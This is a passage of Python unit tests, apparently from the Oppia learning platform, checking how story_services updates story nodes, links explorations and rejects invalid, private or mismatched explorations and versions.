exp_services.get_story_id_linked_to_exploration('0')) self.assertIsNone( exp_services.get_story_id_linked_to_exploration('1')) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': '0' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': None, 'new_value': '1' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') self.assertEqual( exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID) self.assertEqual( exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': '1', 'new_value': '2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': '2', 'new_value': '1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': '0', 'new_value': '2' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') self.assertIsNone( exp_services.get_story_id_linked_to_exploration('0')) self.assertEqual( exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID) self.assertEqual( exp_services.get_story_id_linked_to_exploration('2'), self.STORY_ID) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': '2', 'new_value': '0' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': '1', 'new_value': '2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': self.NODE_ID_2 }), story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_3', 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_1, 'old_value': [], 'new_value': ['node_3'] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': 'node_3', 'old_value': None, 'new_value': '1' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') self.assertEqual( exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID) self.assertEqual( exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID) self.assertIsNone( exp_services.get_story_id_linked_to_exploration('2')) story_services.delete_story(self.USER_ID, self.STORY_ID) self.assertIsNone( exp_services.get_story_id_linked_to_exploration('0')) self.assertIsNone( exp_services.get_story_id_linked_to_exploration('1')) self.assertIsNone( exp_services.get_story_id_linked_to_exploration('2')) self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, 'story_id_2') # Creates node 1 -> node 2 -> node 3, links exp IDs 0, 1 and 2 with them # respectively. Then, deletes 2, 3, adds node 4 (node 1 -> node 4), # deletes it and adds node 5 (node 1 -> node 5). change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_1', 'title': 'Title 1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_2', 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_3', 'title': 'Title 3' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_1, 'old_value': [], 'new_value': ['node_2'] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_2, 'old_value': [], 'new_value': ['node_3'] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': '0' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': None, 'new_value': '1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': 'node_3', 'old_value': None, 'new_value': '2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': self.NODE_ID_2 }), story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': 'node_3' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_4', 'title': 'Title 4' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': 'node_4', 'old_value': None, 'new_value': '2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': 'node_4' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': 'node_5', 'title': 'Title 5' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': 'node_1', 'old_value': ['node_2'], 'new_value': ['node_5'] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': 'node_5', 'old_value': None, 'new_value': '1' })] story_services.update_story( self.USER_ID, 'story_id_2', change_list, 'Updated story node.') self.assertEqual( exp_services.get_story_id_linked_to_exploration('0'), 'story_id_2') self.assertEqual( exp_services.get_story_id_linked_to_exploration('1'), 'story_id_2') self.assertIsNone( exp_services.get_story_id_linked_to_exploration('2')) def test_exploration_story_link_collision(self): self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, 'story_id_2') self.save_new_valid_exploration( '0', self.user_id_admin, title='Title 1', category='Mathematics', language_code='en', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_admin, '0') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': '0' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_1, 'title': 'Title 1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': '0' })] with self.assertRaisesRegexp( Exception, 'The exploration with ID 0 is already linked to story ' 'with ID %s' % self.STORY_ID): story_services.update_story( self.USER_ID, 'story_id_2', change_list, 'Added chapter.') def test_cannot_update_story_acquired_skill_ids_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS), 'node_id': 'invalid_node', 'old_value': [], 'new_value': ['skill_id'] })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story acquired_skill_ids.') def test_update_story_notes(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.notes, 'Notes') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_NOTES, 'old_value': 'Notes', 'new_value': 'New notes' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story notes.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.notes, 'New notes') def test_update_story_language_code(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.language_code, 'en') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE, 'old_value': 'en', 'new_value': 'bn' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story language_code.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.language_code, 'bn') def test_update_story_url_fragment(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.url_fragment, 'title') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT, 'old_value': 'title', 'new_value': 'updated-title' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story url_fragment.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.url_fragment, 'updated-title') def test_cannot_update_story_if_url_fragment_already_exists(self): topic_id = topic_fetchers.get_new_topic_id() story_id = story_services.get_new_story_id() self.save_new_story( story_id, self.USER_ID, topic_id, title='original', url_fragment='original') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT, 'old_value': 'title', 'new_value': 'original' })] exception_message = 'Story Url Fragment is not unique across the site.' with self.assertRaisesRegexp(Exception, exception_message): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story url_fragment.') def test_cannot_update_story_with_no_change_list(self): with self.assertRaisesRegexp( Exception, 'Unexpected error: received an invalid change list when trying to ' 'save story'): story_services.update_story( self.USER_ID, self.STORY_ID, [], 'Commit message') def test_cannot_update_story_with_invalid_exploration_id(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'invalid_exp_id' })] with self.assertRaisesRegexp( Exception, 'Expected story to only reference valid explorations'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_validate_exploration_throws_an_exception(self): observed_log_messages = [] def _mock_logging_function(msg): """Mocks logging.exception().""" observed_log_messages.append(msg) def _mock_validate_function(_exploration, _strict): """Mocks logging.exception().""" raise Exception('Error in exploration') logging_swap = self.swap(logging, 'exception', _mock_logging_function) validate_fn_swap = self.swap( exp_services, 'validate_exploration_for_story', _mock_validate_function) with logging_swap, validate_fn_swap: self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') with self.assertRaisesRegexp( Exception, 'Error in exploration'): story_services.validate_explorations_for_story( ['exp_id_1'], False) self.assertItemsEqual( observed_log_messages, [ 'Exploration validation failed for exploration with ' 'ID: exp_id_1. Error: Error in exploration']) def test_validate_exploration_returning_error_messages(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', correctness_feedback_enabled=True) validation_error_messages = ( story_services.validate_explorations_for_story( ['invalid_exp', 'exp_id_1'], False)) message_1 = ( 'Expected story to only reference valid explorations, but found ' 'a reference to an invalid exploration with ID: invalid_exp') message_2 = ( 'Exploration with ID exp_id_1 is not public. Please publish ' 'explorations before adding them to a story.' ) self.assertEqual(validation_error_messages, [message_1, message_2]) def test_cannot_update_story_with_private_exploration_id(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', correctness_feedback_enabled=True) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' })] with self.assertRaisesRegexp( Exception, 'Exploration with ID exp_id_1 is not public'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_blank_exp_id(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': self.EXP_ID, 'new_value': None })] with self.assertRaisesRegexp( Exception, 'Story node with id node_1 does not contain an ' 'exploration id.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_different_categories(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') self.save_new_valid_exploration( 'exp_id_2', self.user_id_a, title='title', category='Category 2', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_2') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': 'node_1', 'old_value': [], 'new_value': ['node_2'] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': None, 'new_value': 'exp_id_2' }) ] validation_error_messages = ( story_services.validate_explorations_for_story( ['exp_id_2', 'exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'All explorations in a story should be of the same category. ' 'The explorations with ID exp_id_2 and exp_id_1 have different ' 'categories.']) with self.assertRaisesRegexp( Exception, 'All explorations in a story should be of the ' 'same category'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_other_languages(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', language_code='es', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'Invalid language es found for exploration with ID exp_id_1.']) with self.assertRaisesRegexp( Exception, 'Invalid language es found for exploration with ' 'ID exp_id_1'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_without_correctness_feedback(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', language_code='en') self.publish_exploration(self.user_id_a, 'exp_id_1') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'Expected all explorations to have correctness feedback ' 'enabled. Invalid exploration: exp_id_1']) with self.assertRaisesRegexp( Exception, 'Expected all explorations to have correctness feedback ' 'enabled. Invalid exploration: exp_id_1'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_invalid_interactions(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', interaction_id='LogicProof', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'Invalid interaction LogicProof in exploration with ID: ' 'exp_id_1.']) with self.assertRaisesRegexp( Exception, 'Invalid interaction LogicProof in exploration with ' 'ID: exp_id_1'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_recommended_exps(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', interaction_id='TextInput', end_state_name='End', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') exp_services.update_exploration( self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({ 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY, 'property_name': ( exp_domain.STATE_PROPERTY_INTERACTION_CUST_ARGS), 'state_name': 'End', 'new_value': { 'recommendedExplorationIds': { 'value': ['1', '2'] } } })], 'Updated State Content') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'Exploration with ID: exp_id_1 contains exploration ' 'recommendations in its EndExploration interaction.']) with self.assertRaisesRegexp( Exception, 'Exploration with ID: exp_id_1 contains exploration ' 'recommendations in its EndExploration interaction.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_invalid_rte_content(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', end_state_name='End', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_a, 'exp_id_1') exp_services.update_exploration( self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({ 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY, 'property_name': exp_domain.STATE_PROPERTY_CONTENT, 'state_name': 'Introduction', 'new_value': { 'content_id': 'content', 'html': ( '<oppia-noninteractive-collapsible content-with-value=' '"&amp;quot;&amp;lt;p&amp;gt;Hello&amp;lt;/p&amp;gt;' '&amp;quot;" heading-with-value="&amp;quot;' 'SubCollapsible&amp;quot;">' '</oppia-noninteractive-collapsible>') } })], 'Updated State Content.') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'RTE content in state Introduction of exploration with ' 'ID exp_id_1 is not supported on mobile.']) with self.assertRaisesRegexp( Exception, 'RTE content in state Introduction of exploration with ' 'ID exp_id_1 is not supported on mobile.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_exps_with_parameter_values(self): topic_services.publish_story( self.TOPIC_ID, self.STORY_ID, self.user_id_admin) self.save_new_valid_exploration( 'exp_id_1', self.user_id_a, title='title', category='Category 1', correctness_feedback_enabled=True) exp_services.update_exploration( self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({ 'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY, 'property_name': 'param_specs', 'new_value': { 'theParameter': param_domain.ParamSpec('UnicodeString').to_dict() } })], '') self.publish_exploration(self.user_id_a, 'exp_id_1') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id_1' }) ] validation_error_messages = ( story_services.validate_explorations_for_story(['exp_id_1'], False)) self.assertEqual( validation_error_messages, [ 'Expected no exploration to have parameter values in' ' it. Invalid exploration: exp_id_1']) with self.assertRaisesRegexp( Exception, 'Expected no exploration to have parameter values in' ' it. Invalid exploration: exp_id_1'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') self.save_new_valid_exploration( 'exp_id_2', self.user_id_a, title='title 2', category='Category 1', interaction_id='LogicProof', correctness_feedback_enabled=True) exp_services.update_exploration( self.user_id_a, 'exp_id_2', [exp_domain.ExplorationChange({ 'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY, 'property_name': 'param_specs', 'new_value': { 'param1': param_domain.ParamSpec('UnicodeString').to_dict() } }), exp_domain.ExplorationChange({ 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY, 'property_name': exp_domain.STATE_PROPERTY_PARAM_CHANGES, 'state_name': feconf.DEFAULT_INIT_STATE_NAME, 'new_value': [ param_domain.ParamChange('param1', 'Copier', {}).to_dict()] })], '') self.publish_exploration(self.user_id_a, 'exp_id_2') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': 'exp_id_1', 'new_value': 'exp_id_2' }) ] with self.assertRaisesRegexp( Exception, 'Expected no exploration to have parameter values in' ' it. Invalid exploration: exp_id_2'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_cannot_update_story_with_mismatch_of_story_versions(self): self.save_new_default_exploration( 'exp_id', self.user_id_a, title='title') self.publish_exploration(self.user_id_a, 'exp_id') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id' })] story_model = story_models.StoryModel.get(self.STORY_ID) story_model.version = 0 story_model.commit(self.user_id_a, 'Changed version', []) with self.assertRaisesRegexp( Exception, 'Unexpected error: trying to update version 1 of story ' 'from version 2. Please reload the page and try again.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') story_model = story_models.StoryModel.get(self.STORY_ID) story_model.version = 10 story_model.commit(self.user_id_a, 'Changed version', []) with self.assertRaisesRegexp( Exception, 'Trying to update version 11 of story from version 2, ' 'which is too old. Please reload the page and try again.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') def test_get_story_by_version(self): topic_id = topic_fetchers.get_new_topic_id() story_id = story_services.get_new_story_id() self.save_new_topic( topic_id, self.USER_ID, name='A different topic', abbreviated_name='different-topic', url_fragment='different-topic', description='A new topic', canonical_story_ids=[], additional_story_ids=[], uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0) self.save_new_story( story_id, self.USER_ID, topic_id, title='new title') topic_services.add_canonical_story(self.USER_ID, topic_id, story_id) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE, 'old_value': 'en', 'new_value': 'bn' })] story_services.update_story( self.USER_ID, story_id, change_list, 'Updated story language_code.') story_v1 = story_fetchers.get_story_by_id(story_id, version=1) story_v2 = story_fetchers.get_story_by_id(story_id, version=2) self.assertEqual(story_v1.language_code, 'en') self.assertEqual(story_v2.language_code, 'bn') def test_cannot_update_initial_node_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY, 'property_name': story_domain.INITIAL_NODE_ID, 'old_value': '', 'new_value': 'new_initial_node_id' })] with self.assertRaisesRegexp( Exception, 'The node with id new_initial_node_id is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story initial_node_id.') def test_rearrange_node_in_story(self): changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }) ] story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Added story node.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_1) self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_2) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY, 'property_name': story_domain.NODE, 'old_value': 1, 'new_value': 0 })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Added story node.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_2) self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_1) def test_cannot_update_node_exploration_id_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID, 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'exp_id' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node_exploration_id.') def test_cannot_update_node_exploration_id_with_existing_exploration_id( self): self.save_new_default_exploration( 'exp_id', self.user_id_a, title='title') self.publish_exploration(self.user_id_a, 'exp_id') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': 'exp_id' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node.') change_list = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_1, 'old_value': [], 'new_value': [self.NODE_ID_2] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_2, 'old_value': None, 'new_value': 'exp_id' }) ] with self.assertRaisesRegexp( Exception, 'A node with exploration id exp_id already exists.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story node_exploration_id.') def test_cannot_update_destination_node_ids_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': 'invalid_node', 'old_value': [], 'new_value': [] })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story new_destination_node_ids.') def 